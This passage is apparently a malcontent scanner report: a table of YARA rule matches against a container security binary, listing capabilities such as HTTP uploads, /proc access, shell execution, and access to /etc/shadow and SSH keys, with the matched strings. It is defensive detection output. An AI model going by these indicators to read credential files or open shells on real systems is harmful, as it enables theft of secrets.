[HTTP](https://github.com/search?q=HTTP&type=code) | -| MEDIUM | [net/http/form/upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http-form-upload.yara#http_form_upload) | upload content via HTTP form | [POST](https://github.com/search?q=POST&type=code)
[application/json](https://github.com/search?q=application%2Fjson&type=code)
[application/x-www-form-urlencoded](https://github.com/search?q=application%2Fx-www-form-urlencoded&type=code) | -| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http-post.yara#http_post) | submits content to websites | [Content-Type](https://github.com/search?q=Content-Type&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | -| MEDIUM | [net/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping not acked within timeout](https://github.com/search?q=ping+not+acked+within+timeout&type=code) | -| MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip-parse.yara#ip_go) | parses IP address (IPv4 or IPv6) | [IsLinkLocalUnicast](https://github.com/search?q=IsLinkLocalUnicast&type=code)
[IsSingleIP](https://github.com/search?q=IsSingleIP&type=code) | -| MEDIUM | [net/mac/address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/mac-address.yara#macaddr) | Retrieves network MAC address | [MAC address](https://github.com/search?q=MAC+address&type=code)
[macAddress](https://github.com/search?q=macAddress&type=code) | -| MEDIUM | [net/sftp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/sftp.yara#sftp) | Supports sftp (FTP over SSH) | [sftp](https://github.com/search?q=sftp&type=code)
[ssh](https://github.com/search?q=ssh&type=code) | -| MEDIUM | [net/socket/connect](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-connect.yara#_connect) | [initiate a connection on a socket](https://linux.die.net/man/3/connect) | [_connect](https://github.com/search?q=_connect&type=code) | -| MEDIUM | [net/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ssh.yara#ssh) | Uses SSH (secure shell) service | [SSH](https://github.com/search?q=SSH&type=code) | -| MEDIUM | [net/stat](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/stat.yara#netstat) | Uses 'netstat' for network information | [netstatmodinfonil keyde](https://github.com/search?q=netstatmodinfonil+keyde&type=code) | -| MEDIUM | [net/upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/upload.yara#upload) | uploads files | [UploadUUID](https://github.com/search?q=UploadUUID&type=code)
[UploadedLayers](https://github.com/search?q=UploadedLayers&type=code)
[uploadCurrentInfo](https://github.com/search?q=uploadCurrentInfo&type=code)
[uploadgoogle](https://github.com/search?q=uploadgoogle&type=code)
[uploads](https://github.com/search?q=uploads&type=code) | -| MEDIUM | [net/url/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url-encode.yara#url_encode) | encodes URL, likely to pass GET variables | [urlencode](https://github.com/search?q=urlencode&type=code) | -| MEDIUM | [net/url/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url-request.yara#requests_urls) | requests resources via URL | [http.request](https://github.com/search?q=http.request&type=code)
[net/url](https://github.com/search?q=net%2Furl&type=code) | -| MEDIUM | [process/name/get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | -| MEDIUM | [procfs/arbitrary/pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/procfs/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%d/mounts/sys](https://github.com/search?q=%2Fproc%2F%25d%2Fmounts%2Fsys&type=code)
[/proc/%d/root/kube](https://github.com/search?q=%2Fproc%2F%25d%2Froot%2Fkube&type=code)
[/proc/%d/rootFA](https://github.com/search?q=%2Fproc%2F%25d%2FrootFA&type=code)
[/proc/%d/task/](https://github.com/search?q=%2Fproc%2F%25d%2Ftask%2F&type=code)
[/proc/%dcopy](https://github.com/search?q=%2Fproc%2F%25dcopy&type=code)
[/proc/%v/stat](https://github.com/search?q=%2Fproc%2F%25v%2Fstat&type=code) | -| MEDIUM | [procfs/cpuinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/procfs/cpuinfo.yara#proc_cpuinfo) | get CPU info | [/proc/cpuinfo](https://github.com/search?q=%2Fproc%2Fcpuinfo&type=code) | -| MEDIUM | [procfs/self/cgroup](https://github.com/chainguard-dev/malcontent/blob/main/rules/procfs/self-cgroup.yara#pid_self_cgroup) | accesses /proc files within own cgroup | [/proc/self/cgroup](https://github.com/search?q=%2Fproc%2Fself%2Fcgroup&type=code) | -| MEDIUM | [procfs/self/mountinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/procfs/self-mountinfo.yara#proc_self_mountinfo) | gets mount info associated to this process | [/proc/self/mountinfo](https://github.com/search?q=%2Fproc%2Fself%2Fmountinfo&type=code) | -| MEDIUM | [ref/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/daemon.yara#daemon) | Run as a background daemon | [build-daemon](https://github.com/search?q=build-daemon&type=code)
[docker_daemon](https://github.com/search?q=docker_daemon&type=code) | -| MEDIUM | [ref/ip_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/ip_port.yara#ip_and_port) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[add_port](https://github.com/search?q=add_port&type=code)
[attachPort](https://github.com/search?q=attachPort&type=code)
[clientPort](https://github.com/search?q=clientPort&type=code)
[cluster_ip](https://github.com/search?q=cluster_ip&type=code)
[del_port](https://github.com/search?q=del_port&type=code)
[detachPort](https://github.com/search?q=detachPort&type=code)
[dstPort](https://github.com/search?q=dstPort&type=code)
[dst_ip](https://github.com/search?q=dst_ip&type=code)
[dst_port](https://github.com/search?q=dst_port&type=code)
[exPort](https://github.com/search?q=exPort&type=code)
[fqdn_ip](https://github.com/search?q=fqdn_ip&type=code)
[global_ip](https://github.com/search?q=global_ip&type=code)
[hasPort](https://github.com/search?q=hasPort&type=code)
[hostIp](https://github.com/search?q=hostIp&type=code)
[hostPort](https://github.com/search?q=hostPort&type=code)
[host_ip](https://github.com/search?q=host_ip&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[inPort](https://github.com/search?q=inPort&type=code)
[in_port](https://github.com/search?q=in_port&type=code)
[ipPort](https://github.com/search?q=ipPort&type=code)
[ip_port](https://github.com/search?q=ip_port&type=code)
[lIp](https://github.com/search?q=lIp&type=code)
[local_ip](https://github.com/search?q=local_ip&type=code)
[local_port](https://github.com/search?q=local_port&type=code)
[lookupPort](https://github.com/search?q=lookupPort&type=code)
[nat_ip](https://github.com/search?q=nat_ip&type=code)
[nat_port](https://github.com/search?q=nat_port&type=code)
[nfq_port](https://github.com/search?q=nfq_port&type=code)
[pIp](https://github.com/search?q=pIp&type=code)
[parsePort](https://github.com/search?q=parsePort&type=code)
[readPort](https://github.com/search?q=readPort&type=code)
[remote_ip](https://github.com/search?q=remote_ip&type=code)
[remote_port](https://github.com/search?q=remote_port&type=code)
[rpcPort](https://github.com/search?q=rpcPort&type=code)
[serverPort](https://github.com/search?q=serverPort&type=code)
[server_port](https://github.com/search?q=server_port&type=code)
[srcPort](https://github.com/search?q=srcPort&type=code)
[src_ip](https://github.com/search?q=src_ip&type=code)
[src_port](https://github.com/search?q=src_port&type=code)
[srvc_port](https://github.com/search?q=srvc_port&type=code)
[syslog_ip](https://github.com/search?q=syslog_ip&type=code)
[syslog_port](https://github.com/search?q=syslog_port&type=code)
[tap_port](https://github.com/search?q=tap_port&type=code)
[unkn_ip](https://github.com/search?q=unkn_ip&type=code)
[unknown_ip](https://github.com/search?q=unknown_ip&type=code) | -| MEDIUM | [ref/path/etc/hosts](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/etc-hosts.yara#etc_hosts) | references /etc/hosts | [/etc/hosts](https://github.com/search?q=%2Fetc%2Fhosts&type=code) | -| MEDIUM | [ref/path/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/hidden.yara#static_hidden_path) | hidden path in a system directory | [/meminfo/etc/timezone/dev/.udev](https://github.com/search?q=%2Fmeminfo%2Fetc%2Ftimezone%2Fdev%2F.udev&type=code)
[/usr/local/bin/.nvcontainerRunnin](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2F.nvcontainerRunnin&type=code) | -| MEDIUM | [ref/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/home.yara#home_path) | references path within /home | [/home/.](https://github.com/search?q=%2Fhome%2F.&type=code) | -| MEDIUM | [ref/path/root](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/root.yara#root_path_val) | path reference within /root | [/root/%shostLookupOrder](https://github.com/search?q=%2Froot%2F%25shostLookupOrder&type=code)
[/root//proc/self/cgroup1192092895507812559604644775390625invalid](https://github.com/search?q=%2Froot%2F%2Fproc%2Fself%2Fcgroup1192092895507812559604644775390625invalid&type=code)
[/root/0x%08xcountsAliyunD.2.14D.3.10D.3.11D.3.12D.3.13D.3.14D.3.15D.3.](https://github.com/search?q=%2Froot%2F0x%2508xcountsAliyunD.2.14D.3.10D.3.11D.3.12D.3.13D.3.14D.3.15D.3.&type=code)
[/root/Switch](https://github.com/search?q=%2Froot%2FSwitch&type=code)
[/root/containers](https://github.com/search?q=%2Froot%2Fcontainers&type=code)
[/root/etc/crio/crio.conf.d/00-default.confUnable](https://github.com/search?q=%2Froot%2Fetc%2Fcrio%2Fcrio.conf.d%2F00-default.confUnable&type=code)
[/root/etc/crio/crio.conf.d/00-defaultRunning](https://github.com/search?q=%2Froot%2Fetc%2Fcrio%2Fcrio.conf.d%2F00-defaultRunning&type=code)
[/root/etc/crio/crio.conf/run/containerd/containerd.sockDirectory](https://github.com/search?q=%2Froot%2Fetc%2Fcrio%2Fcrio.conf%2Frun%2Fcontainerd%2Fcontainerd.sockDirectory&type=code)
[/root/etc/hostnameusr/lib/os-releaseetc/centos-releaseetc/redhat-relea](https://github.com/search?q=%2Froot%2Fetc%2Fhostnameusr%2Flib%2Fos-releaseetc%2Fcentos-releaseetc%2Fredhat-relea&type=code)
[/root/etc/hostsImage](https://github.com/search?q=%2Froot%2Fetc%2FhostsImage&type=code)
[/root/etc/resolv.confFMON](https://github.com/search?q=%2Froot%2Fetc%2Fresolv.confFMON&type=code)
[/root/kube-schedulerUnknown](https://github.com/search?q=%2Froot%2Fkube-schedulerUnknown&type=code)
[/root/sys/fs/aufs/si_%s227373675443232059478759765625SendMsg](https://github.com/search?q=%2Froot%2Fsys%2Ffs%2Faufs%2Fsi_%25s227373675443232059478759765625SendMsg&type=code) | -| MEDIUM | [ref/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/cis-1.8.0//tmp/cis-1.6.0/run](https://github.com/search?q=%2Ftmp%2Fcis-1.8.0%2F%2Ftmp%2Fcis-1.6.0%2Frun&type=code)
[/tmp/container.shfile](https://github.com/search?q=%2Ftmp%2Fcontainer.shfile&type=code)
[/tmp/ctrl_listen.sockFailed](https://github.com/search?q=%2Ftmp%2Fctrl_listen.sockFailed&type=code)
[/tmp/dp_client.%d4e](https://github.com/search?q=%2Ftmp%2Fdp_client.%25d4e&type=code)
[/tmp/dp_listen.sockRead](https://github.com/search?q=%2Ftmp%2Fdp_listen.sockRead&type=code)
[/tmp/host.shInactiveAnonobject/host/block_accessGRP](https://github.com/search?q=%2Ftmp%2Fhost.shInactiveAnonobject%2Fhost%2Fblock_accessGRP&type=code)
[/tmp/kube_master.sh/tmp/kube_worker.sh%sbench/workload/%sGRPC](https://github.com/search?q=%2Ftmp%2Fkube_master.sh%2Ftmp%2Fkube_worker.sh%25sbench%2Fworkload%2F%25sGRPC&type=code)
[/tmp/neuvector/consul.json](https://github.com/search?q=%2Ftmp%2Fneuvector%2Fconsul.json&type=code)
[/tmp/neuvector/raft/peers.json/etc/neuvector/certs/internal/Failed](https://github.com/search?q=%2Ftmp%2Fneuvector%2Fraft%2Fpeers.json%2Fetc%2Fneuvector%2Fcerts%2Finternal%2FFailed&type=code)
[/tmp/neuvectorcan](https://github.com/search?q=%2Ftmp%2Fneuvectorcan&type=code)
[/tmp/ready](https://github.com/search?q=%2Ftmp%2Fready&type=code)
[/tmp/rh-1.4.0//tmp/cis-1.24//tmp/cis-1.23/kube-apiservercontainers](https://github.com/search?q=%2Ftmp%2Frh-1.4.0%2F%2Ftmp%2Fcis-1.24%2F%2Ftmp%2Fcis-1.23%2Fkube-apiservercontainers&type=code)
[/tmp/walkWorkload](https://github.com/search?q=%2Ftmp%2FwalkWorkload&type=code) | -| MEDIUM | [ref/path/usr/local](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/usr-local.yara#usr_local_bin_path) | path reference within /usr/local/bin | [/usr/local/bin/.nvcontainerRunning](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2F.nvcontainerRunning&type=code)
[/usr/local/bin/SHD](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2FSHD&type=code)
[/usr/local/bin/admin-assembly-too](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fadmin-assembly-too&type=code)
[/usr/local/bin/agentListenSocket](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2FagentListenSocket&type=code)
[/usr/local/bin/consulgrpc](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fconsulgrpc&type=code)
[/usr/local/bin/controllercontext](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fcontrollercontext&type=code)
[/usr/local/bin/dpexiting](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fdpexiting&type=code)
[/usr/local/bin/fetcher/usr/local/bin/adapterio.kubernetes.pod.nameFailed](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Ffetcher%2Fusr%2Flocal%2Fbin%2Fadapterio.kubernetes.pod.nameFailed&type=code)
[/usr/local/bin/host.tmplNode](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fhost.tmplNode&type=code)
[/usr/local/bin/kube_master_1_0_0.tmpl/usr/local/bin/kube_worker_1_0_0.tmplresc](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_master_1_0_0.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_0_0.tmplresc&type=code)
[/usr/local/bin/kube_master_1_2_0.tmpl/usr/local/bin/kube_worker_1_2_0.tmpl/usr](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_master_1_2_0.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_2_0.tmpl%2Fusr&type=code)
[/usr/local/bin/kube_master_1_4_1.tmpl/usr/local/bin/kube_worker_1_4_1.tmpl/usr](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_master_1_4_1.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_4_1.tmpl%2Fusr&type=code)
[/usr/local/bin/kube_master_1_5_1.tmpl/usr/local/bin/kube_worker_1_5_1.tmpl/usr](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_master_1_5_1.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_5_1.tmpl%2Fusr&type=code)
[/usr/local/bin/kube_master_gke_1_0_0.tmpl/usr/local/bin/kube_worker_gke_1_0_0.](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_master_gke_1_0_0.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_worker_gke_1_0_0.&type=code)
[/usr/local/bin/kube_master_ocp_4_3.tmpl/usr/local/bin/kube_worker_ocp_4_3.tmpl](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_master_ocp_4_3.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_worker_ocp_4_3.tmpl&type=code)
[/usr/local/bin/kube_master_ocp_4_5.tmpl/usr/local/bin/kube_worker_ocp_4_5.tmpl](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_master_ocp_4_5.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_worker_ocp_4_5.tmpl&type=code)
[/usr/local/bin/kube_runner.tmplCannot](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_runner.tmplCannot&type=code)
[/usr/local/bin/kube_worker_1_0_0.tmplreschedule](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_0_0.tmplreschedule&type=code)
[/usr/local/bin/kube_worker_1_2_0.tmpl/usr/local/bin/kube_master_1_0_0.tmpl/usr](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_2_0.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_master_1_0_0.tmpl%2Fusr&type=code)
[/usr/local/bin/kube_worker_1_4_1.tmpl/usr/local/bin/kube_master_1_2_0.tmpl/usr](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_4_1.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_master_1_2_0.tmpl%2Fusr&type=code)
[/usr/local/bin/kube_worker_1_5_1.tmpl/usr/local/bin/kube_master_1_4_1.tmpl/usr](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_5_1.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_master_1_4_1.tmpl%2Fusr&type=code)
[/usr/local/bin/kube_worker_gke_1_0_0.tmplDocker](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_worker_gke_1_0_0.tmplDocker&type=code)
[/usr/local/bin/kube_worker_ocp_4_3.tmplexpected](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_worker_ocp_4_3.tmplexpected&type=code)
[/usr/local/bin/kube_worker_ocp_4_5.tmpl/usr/local/bin/kube_master_ocp_4_3.tmpl](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_worker_ocp_4_5.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_master_ocp_4_3.tmpl&type=code)
[/usr/local/bin/kubecis_1_2_0.rem/usr/local/bin/kubecis_1_0_0.remGet](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkubecis_1_2_0.rem%2Fusr%2Flocal%2Fbin%2Fkubecis_1_0_0.remGet&type=code)
[/usr/local/bin/kubecis_1_4_1.rem/usr/local/bin/kubecis_1_2_0.rem/usr/local/bin](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkubecis_1_4_1.rem%2Fusr%2Flocal%2Fbin%2Fkubecis_1_2_0.rem%2Fusr%2Flocal%2Fbin&type=code)
[/usr/local/bin/kubecis_1_5_1.rem/usr/local/bin/kubecis_1_4_1.rem/usr/local/bin](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkubecis_1_5_1.rem%2Fusr%2Flocal%2Fbin%2Fkubecis_1_4_1.rem%2Fusr%2Flocal%2Fbin&type=code)
[/usr/local/bin/kubecis_1_6_0.remController](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkubecis_1_6_0.remController&type=code)
[/usr/local/bin/kubecis_gke_1_0_0.remDocker](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkubecis_gke_1_0_0.remDocker&type=code)
[/usr/local/bin/kubecis_ocp_4_5.rem/usr/local/bin/kubecis_ocp_4_3.remUnable](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkubecis_ocp_4_5.rem%2Fusr%2Flocal%2Fbin%2Fkubecis_ocp_4_3.remUnable&type=code)
[/usr/local/bin/monitor/usr/local/bin/fetcher/usr/local/bin/adapterio.kubernete](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fmonitor%2Fusr%2Flocal%2Fbin%2Ffetcher%2Fusr%2Flocal%2Fbin%2Fadapterio.kubernete&type=code)
[/usr/local/bin/nstoolscontainer-docker-bench](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fnstoolscontainer-docker-bench&type=code)
[/usr/local/bin/opacontext.Backgroundentering](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fopacontext.Backgroundentering&type=code)
[/usr/local/bin/pathWalkershare.EnforcerScanServiceScanErrSignatureScanErrorsha](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2FpathWalkershare.EnforcerScanServiceScanErrSignatureScanErrorsha&type=code)
[/usr/local/bin/progvar/lib/dpkg/statusno](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fprogvar%2Flib%2Fdpkg%2Fstatusno&type=code)
[/usr/local/bin/rh_runner.tmpl/usr/local/bin/container.tmplRunning](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Frh_runner.tmpl%2Fusr%2Flocal%2Fbin%2Fcontainer.tmplRunning&type=code)
[/usr/local/bin/scannerPROC](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2FscannerPROC&type=code)
[/usr/local/bin/scannerTask/sbin/xtables-legacy-multiccBalancerWrapper](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2FscannerTask%2Fsbin%2Fxtables-legacy-multiccBalancerWrapper&type=code)
[/usr/local/bin/sigstore-interfacegrpc](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fsigstore-interfacegrpc&type=code)
[/usr/local/bin/tcpdumpservice](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Ftcpdumpservice&type=code)
[/usr/local/binFA](https://github.com/search?q=%2Fusr%2Flocal%2FbinFA&type=code) | -| MEDIUM | [ref/path/var/run](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/var-run.yara#var_run_subfolder) | references subfolder within /var/run | [/var/run/crio/](https://github.com/search?q=%2Fvar%2Frun%2Fcrio%2F&type=code)
[/var/run/docker.sock/](https://github.com/search?q=%2Fvar%2Frun%2Fdocker.sock%2F&type=code)
[/var/run/dockershim.sock/](https://github.com/search?q=%2Fvar%2Frun%2Fdockershim.sock%2F&type=code)
[/var/run/openvswitch/](https://github.com/search?q=%2Fvar%2Frun%2Fopenvswitch%2F&type=code)
[/var/run/secrets/](https://github.com/search?q=%2Fvar%2Frun%2Fsecrets%2F&type=code) | -| MEDIUM | [ref/words/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/exclamation.yara#exclamations) | gets very excited | [not foundNo interface!!](https://github.com/search?q=not+foundNo+interface%21%21&type=code)
[number println!!](https://github.com/search?q=number+println%21%21&type=code)
[ontain alphanumerical characters onlyexplicitly tagged !!](https://github.com/search?q=ontain+alphanumerical+characters+onlyexplicitly+tagged+%21%21&type=code) | -| MEDIUM | [ref/words/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/heartbeat.yara#heartbeat) | references a 'heartbeat' | [TxHeartbeatErrors](https://github.com/search?q=TxHeartbeatErrors&type=code) | -| MEDIUM | [ref/words/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/intercept.yara#interceptor) | References interception | [interceptor](https://github.com/search?q=interceptor&type=code) | -| MEDIUM | [ref/words/server_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/server_address.yara#server_address) | references a 'server address', possible C2 client | [extensionserverAddressByClientCIDRsdeletionGracePer](https://github.com/search?q=extensionserverAddressByClientCIDRsdeletionGracePer&type=code)
[preconditionsserverAddressincludeObjectfieldSelectorman](https://github.com/search?q=preconditionsserverAddressincludeObjectfieldSelectorman&type=code)
[server_address](https://github.com/search?q=server_address&type=code) | -| MEDIUM | [ref/words/spoof](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/spoof.yara#spoof) | references spoofing | [DeserializeVfSpoofchk](https://github.com/search?q=DeserializeVfSpoofchk&type=code) | -| MEDIUM | [secrets/shadow](https://github.com/chainguard-dev/malcontent/blob/main/rules/secrets/shadow.yara#etc_shadow) | accesses /etc/shadow | [/etc/shadow](https://github.com/search?q=%2Fetc%2Fshadow&type=code) | -| MEDIUM | [secrets/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/secrets/ssh.yara#ssh_folder) | [accesses SSH configuration and/or keys](https://www.sentinelone.com/blog/macos-malware-2023-a-deep-dive-into-emerging-trends-and-evolving-techniques/) | [.ssh/usr/local/binFA](https://github.com/search?q=.ssh%2Fusr%2Flocal%2FbinFA&type=code) | -| MEDIUM | [security_controls/linux/iptables](https://github.com/chainguard-dev/malcontent/blob/main/rules/security_controls/linux/iptables.yara#iptables) | [interacts with the iptables firewall](https://www.netfilter.org/projects/iptables/) | [iptables](https://github.com/search?q=iptables&type=code) | -| MEDIUM | [shell/exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/shell/exec.yara#calls_shell) | executes shell | [/bin/bash](https://github.com/search?q=%2Fbin%2Fbash&type=code)
[/bin/dash](https://github.com/search?q=%2Fbin%2Fdash&type=code)
[/bin/sh](https://github.com/search?q=%2Fbin%2Fsh&type=code) | -| LOW | [compression/bzip2](https://github.com/chainguard-dev/malcontent/blob/main/rules/compression/bzip2.yara#bzip2) | Works with bzip2 files | [bzip2](https://github.com/search?q=bzip2&type=code) | -| LOW | [compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/compression/gzip.yara#gzip) | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) | -| LOW | [compression/zstd](https://github.com/chainguard-dev/malcontent/blob/main/rules/compression/zstd.yara#zstd) | Zstandard: fast real-time compression algorithm | [(/](https://github.com/search?q=%28%B5%2F%FD&type=code)
[zstd](https://github.com/search?q=zstd&type=code) | -| LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [AES](https://github.com/search?q=AES&type=code)
[crypto/aes](https://github.com/search?q=crypto%2Faes&type=code) | -| LOW | [crypto/ecdsa](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/ecdsa.yara#crypto_ecdsa) | Uses the Go crypto/ecdsa library | [crypto/ecdsa](https://github.com/search?q=crypto%2Fecdsa&type=code) | -| LOW | [crypto/ed25519](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/ed25519.yara#ed25519) | Elliptic curve algorithm used by TLS and SSH | [ed25519](https://github.com/search?q=ed25519&type=code) | -| LOW | [crypto/tls](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/tls.yara#tls) | tls | [TLS13](https://github.com/search?q=TLS13&type=code)
[TLSVersion](https://github.com/search?q=TLSVersion&type=code)
[crypto/tls](https://github.com/search?q=crypto%2Ftls&type=code) | -| LOW | [encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/encoding/base64.yara#b64) | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | -| LOW | [encoding/json](https://github.com/chainguard-dev/malcontent/blob/main/rules/encoding/json.yara#encoding_json) | Supports JSON encoded objects | [encoding/json](https://github.com/search?q=encoding%2Fjson&type=code) | -| LOW | [encoding/json/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/encoding/json-decode.yara#jsondecode) | Decodes JSON messages | [json.Unmarshal](https://github.com/search?q=json.Unmarshal&type=code) | -| LOW | [encoding/json/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/encoding/json-encode.yara#JSONEncode) | encodes JSON | [MarshalJSON](https://github.com/search?q=MarshalJSON&type=code) | -| LOW | [env/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/env/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [env/TEMP](https://github.com/chainguard-dev/malcontent/blob/main/rules/env/TEMP.yara#tmpdir) | tmpdir | [TEMP](https://github.com/search?q=TEMP&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [env/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/env/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | -| LOW | [env/TMPDIR](https://github.com/chainguard-dev/malcontent/blob/main/rules/env/TMPDIR.yara#TMPDIR) | TMPDIR | [TMPDIR](https://github.com/search?q=TMPDIR&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [env/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/env/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | -| LOW | [fs/directory/list](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory-list.yara#GoReadDir) | Uses Go functions to list a directory | [.ReadDir](https://github.com/search?q=.ReadDir&type=code) | -| LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [Rmdir](https://github.com/search?q=Rmdir&type=code)
[rmdir](https://github.com/search?q=rmdir&type=code) | -| LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlinkat](https://github.com/search?q=unlinkat&type=code) | -| LOW | [fs/file/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-read.yara#go_file_read) | reads files | [ReadFile](https://github.com/search?q=ReadFile&type=code)
